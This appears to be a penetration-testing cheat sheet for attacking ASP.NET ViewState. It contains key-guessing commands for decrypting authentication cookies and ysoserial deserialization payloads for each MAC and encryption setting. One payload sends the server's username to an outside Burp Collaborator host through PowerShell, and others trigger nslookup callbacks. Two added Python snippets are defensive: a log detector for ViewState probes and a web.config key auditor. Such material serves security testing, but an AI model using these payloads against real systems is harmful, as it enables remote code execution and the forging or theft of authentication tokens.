View State

View State:
Used in the ASP.NET framework. This hidden input field holds the state of the page and its controls, and can contain serialized data.

Event Validation:
Checks incoming data to validate possible values and return errors when invalid data is submitted.

Serialization Formats:
- ObjectStateFormatter: Default Deserializer
- LOSFormatter: Default Serializer
- BinaryFormatter:

Common Parameters and Cookies:
- __PREVIOUSPAGE
- __VIEWSTATE
- .aspxauth
- asp.net.applicationcookie
- __VIEWSTATEGENERATOR

MAC Enabled

Note

By default the MAC is disabled before 4.0

Types of MACs:
- SHA1
- AES
- MD5
- HMACSHA256
- HMACSHA384
- HMACSHA512

Blackbox Testing

Check whether an error is returned with the following command:

curl https://victim.com/path/page.aspx?__VIEWSTATE=AAAA
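
Seen from the server side, a probe like the one above puts `__VIEWSTATE` in the query string of a GET request, which IIS records in `cs-uri-query`. The following is an added detection example, not part of the original notes; the log excerpt, field order and 5xx threshold are constructed assumptions.

```python
from urllib.parse import parse_qs

# Constructed IIS W3C log excerpt (documentation IP addresses, sample paths).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2024-01-01 10:00:00 192.0.2.10 GET /path/page.aspx __VIEWSTATE=AAAA 500
2024-01-01 10:00:05 192.0.2.11 GET /path/page.aspx id=7 200
2024-01-01 10:00:09 192.0.2.10 POST /path/page.aspx - 200
2024-01-01 10:00:12 192.0.2.10 GET /other.aspx __viewstate=AAAA&x=1 500
"""


def find_viewstate_in_query(log_text):
    """Return (c-ip, uri-stem, status) for GET requests whose query string
    carries __VIEWSTATE. POST bodies are not recorded in W3C logs."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if row.get("cs-method") != "GET":
            continue
        query = parse_qs(row.get("cs-uri-query", ""), keep_blank_values=True)
        if any(name.upper() == "__VIEWSTATE" for name in query):
            hits.append((row["c-ip"], row["cs-uri-stem"], int(row["sc-status"])))
    return hits


def sources_with_errors(hits, threshold=2):
    """Client IPs with at least `threshold` such requests answered with 5xx."""
    counts = {}
    for ip, _stem, status in hits:
        if status >= 500:
            counts[ip] = counts.get(ip, 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)
```
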

Leaking the Validation Key

Can be found in the web.config file under the machineKey tag. Otherwise it must be leaked through an information disclosure vulnerability.

Test Common Validation Keys:

#Take data from 
AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata 195A989biBjM_NAqqiie5DnHKfcwrNGDuT-Suumqmw6oVyLSsjCFx9Emhf034TDjcuC9mfwNbi6yD-1QlbhcUAgdTOwY0o0sNbg7bJrNyUEf6ZoyYh2QAZHhmxteN_cMQJI7C1WOBEl0ocihUVhKghdxegwRURcYx2h1uMbijX3jsEf59L8Uco_PpfFLN--RtcLTKUvtZd0fH5Sgc1JQmsvTBr7IJ4Ua01I8uyEPYNXZGYvssSzJ8YN6MXioky3WBXv9NGNxDpgTpIPWGetgZ0iOSaTmqPr6sPu4ndesUV4SKsBroIP6Y38rr8LwFCZBKDK5dli4kKwmy9xeM02qshCoLf8ppeOiK2aMLfb9jqkraoss2BflD3hpDdrYHVGH7ryTWQh4HABYDC7OOMgdld3WJ1CUfJ9pmr0qnVFD4Gc --decrypt --purpose=owin.cookie

Encrypted

Note

By default the MAC is disabled before 4.5

Types of Encryption:
- AES (Default)
- 3DES
- DES

Black Box Testing

Remove the __VIEWSTATEENCRYPTED parameter from the request and test the deserialization. If it returns a ViewState MAC validation error, this confirms that a MAC is enabled.

Leaking the Encryption Key

Usually found in the web.config or machine.config files
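
Because both the validation key and the encryption key live in web.config or machine.config, a configuration audit shows what a leak of that file would expose. The following is an added example, not part of the original notes: it flags hard-coded keys, keys that match a local list of published keys, legacy algorithms, and disabled MAC or encryption. The sample file, the placeholder key values and the "legacy" policy sets are assumptions, and the lookup assumes a configuration root without an XML namespace.

```python
import xml.etree.ElementTree as ET

# Constructed sample; the key values are placeholders, not real keys.
SAMPLE_WEB_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="PLACEHOLDER_VALIDATION_KEY_HEX"
                decryptionKey="PLACEHOLDER_DECRYPTION_KEY_HEX"
                validation="MD5" decryption="3DES" />
    <pages enableViewStateMac="false" viewStateEncryptionMode="Never" />
  </system.web>
</configuration>"""

# Assumed policy for this example: flag legacy algorithm choices.
LEGACY_VALIDATION = {"MD5", "SHA1", "3DES"}
LEGACY_DECRYPTION = {"DES", "3DES"}


def audit_web_config(xml_text, known_keys=frozenset()):
    """Return findings; known_keys holds upper-case published key strings."""
    findings = []
    system_web = ET.fromstring(xml_text).find("system.web")
    if system_web is None:
        return findings
    mk = system_web.find("machineKey")
    if mk is not None:
        for attr in ("validationKey", "decryptionKey"):
            value = mk.get(attr, "AutoGenerate")
            if value.startswith("AutoGenerate"):
                continue  # auto-generated, so no key material sits in the file
            findings.append(f"{attr} is hard-coded in the file")
            if value.upper() in known_keys:
                findings.append(f"{attr} appears in the published key list")
        if mk.get("validation", "").upper() in LEGACY_VALIDATION:
            findings.append(f"legacy validation algorithm: {mk.get('validation')}")
        if mk.get("decryption", "").upper() in LEGACY_DECRYPTION:
            findings.append(f"legacy decryption algorithm: {mk.get('decryption')}")
    pages = system_web.find("pages")
    if pages is not None:
        if pages.get("enableViewStateMac", "true").lower() == "false":
            findings.append("enableViewStateMac is false")
        if pages.get("viewStateEncryptionMode", "Auto").lower() == "never":
            findings.append("viewStateEncryptionMode is Never")
    return findings


if __name__ == "__main__":
    for finding in audit_web_config(SAMPLE_WEB_CONFIG):
        print(finding)
```
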

AES256Decryptor
Test Common AES Encryption Keys:

#Take data from the __VIEWSTATE parameter
python decrypter.py --data "DACE7CF24FF4901DF59CAAACDA1EBDEA" --format hex
python decrypter.py --data "2s588k/0kB31nKqs2h696g==" --format base64

Test Common Encryption Keys against the ViewState:

#Take data from __VIEWSTATE
AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata Ve3mZjZwbMRyGTts1EV0F7Hp4eAx11qmXi45oAE7/bDDmA55+Kf9+WWACzUQtly4pRQYkMgmZJnJIDCQQhLNCWaHKbgY7dOiHn8JE7Yx19xvVhYyoqnC8ITLvHiiuJl8+LFmPJwS7ip3vAe+o7mxg2H15VUW5LO56AiTErT7UUw4Au002vflZUF6h/Fx/TJAYciUlZ8CmNW9/GIoPAC9tQ4SVhGD7is8Gu8DiUJE0AjHTLQFcy9vgSk1ovpy4gn9gl98mNVk17uCI7LLYPkvO3Xuix2WTogyqaPQOn7gJz7Say/aqqhmW90LdGo0qeldEUvMGw== --decrypt --purpose=viewstate --IISDirPath "/" --TargetPagePath "/Content/default.aspx"

Test Common Encryption Keys against the asp.net.applicationcookie:

#Take data from asp.net.applicationcookie
AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata 195A989biBjM_NAqqiie5DnHKfcwrNGDuT-Suumqmw6oVyLSsjCFx9Emhf034TDjcuC9mfwNbi6yD-1QlbhcUAgdTOwY0o0sNbg7bJrNyUEf6ZoyYh2QAZHhmxteN_cMQJI7C1WOBEl0ocihUVhKghdxegwRURcYx2h1uMbijX3jsEf59L8Uco_PpfFLN--RtcLTKUvtZd0fH5Sgc1JQmsvTBr7IJ4Ua01I8uyEPYNXZGYvssSzJ8YN6MXioky3WBXv9NGNxDpgTpIPWGetgZ0iOSaTmqPr6sPu4ndesUV4SKsBroIP6Y38rr8LwFCZBKDK5dli4kKwmy9xeM02qshCoLf8ppeOiK2aMLfb9jqkraoss2BflD3hpDdrYHVGH7ryTWQh4HABYDC7OOMgdld3WJ1CUfJ9pmr0qnVFD4Gc --decrypt --purpose=owin.cookie

Test Common Encryption Keys against the .aspxauth cookie:

#Take data from the .aspxauth cookie
AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata CA387A93AD4214F356ED05C26C1E4D80F0804CD526766778B62D4F9213B87B5369755F95008A34644B9CA6B7646E191958A1AE14DB398AB943D3DB042EDA06EC4B5BEA9E3EB60E9877646AD4A50BE9435A2D3B4B3005836CBBBDA64A5E8738511211AA1F --decrypt --purpose=aspxauth

Payloads

Test Exploit with MAC Disabled:

ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "nslookup test.burpcollaborator.net" > payload_when_mac_disabled
ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://test.burpcollaborator.net/$env:UserName" > payload_when_mac_disabled
#Set output as POST Parameter  __VIEWSTATE=$output

Exploit with MAC Enabled:

ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "nslookup test.burpcollaborator.net" --islegacy --isdebug --validationalg="SHA1" --validationkey="011165C2E613D02353C3C59EBECAE15F2EB8D4075D05B04CCD9075F26B80503CFE44C7099E3B97EDD4537B8F98D274784FABF5EBCAB255F861B2CEAE82750EB0" --apppath="/" --path="Hello.aspx" > payload_for_blog.txt
#Set output as POST Parameter  __VIEWSTATE=$output

Exploit with MAC and Encryption Enabled:

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup test.burpcollaborator.net" --generator=93D20A1B --validationalg="SHA1" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0" > payload_for_blog.txt
#Set output as POST Parameter  __VIEWSTATE=$output

Exploit with MAC and Encryption Enabled:

ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "nslookup test.burpcollaborator.net" --path="/site/test.aspx/" --apppath="/directory" --decryptionalg="AES" --decryptionkey="EBA4DC83EB95564524FA63DB6D369C9FBAC5F867962EAC39" --validationalg="SHA1" --validationkey="B3C2624FF313478C1E5BB3B3ED7C21A121389C544F3E38F3AA46C51E91E6ED99E1BDD91A70CFB6FCA0AB53E99DD97609571AF6186DE2E4C0E9C09687B6F579B3" > payload_for_blog.txt
#Set output as POST Parameter  __VIEWSTATE=$output

Exploit with MAC and Encryption Enabled with ViewStateUserKey used:

ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "nslookup test.burpcollaborator.net" --path="/site/test.aspx/" --apppath="/directory" --decryptionalg="AES" --decryptionkey="EBA4DC83EB95564524FA63DB6D369C9FBAC5F867962EAC39" --validationalg="SHA1" --validationkey="B3C2624FF313478C1E5BB3B3ED7C21A121389C544F3E38F3AA46C51E91E6ED99E1BDD91A70CFB6FCA0AB53E99DD97609571AF6186DE2E4C0E9C09687B6F579B3" --viewstateuserkey="randomstringdefinedintheserver" > payload_for_blog.txt
#Set output as POST Parameter  __VIEWSTATE=$output

Tools:
- https://github.com/0xACB/viewgen
- https://github.com/Illuminopi/RCEvil.NET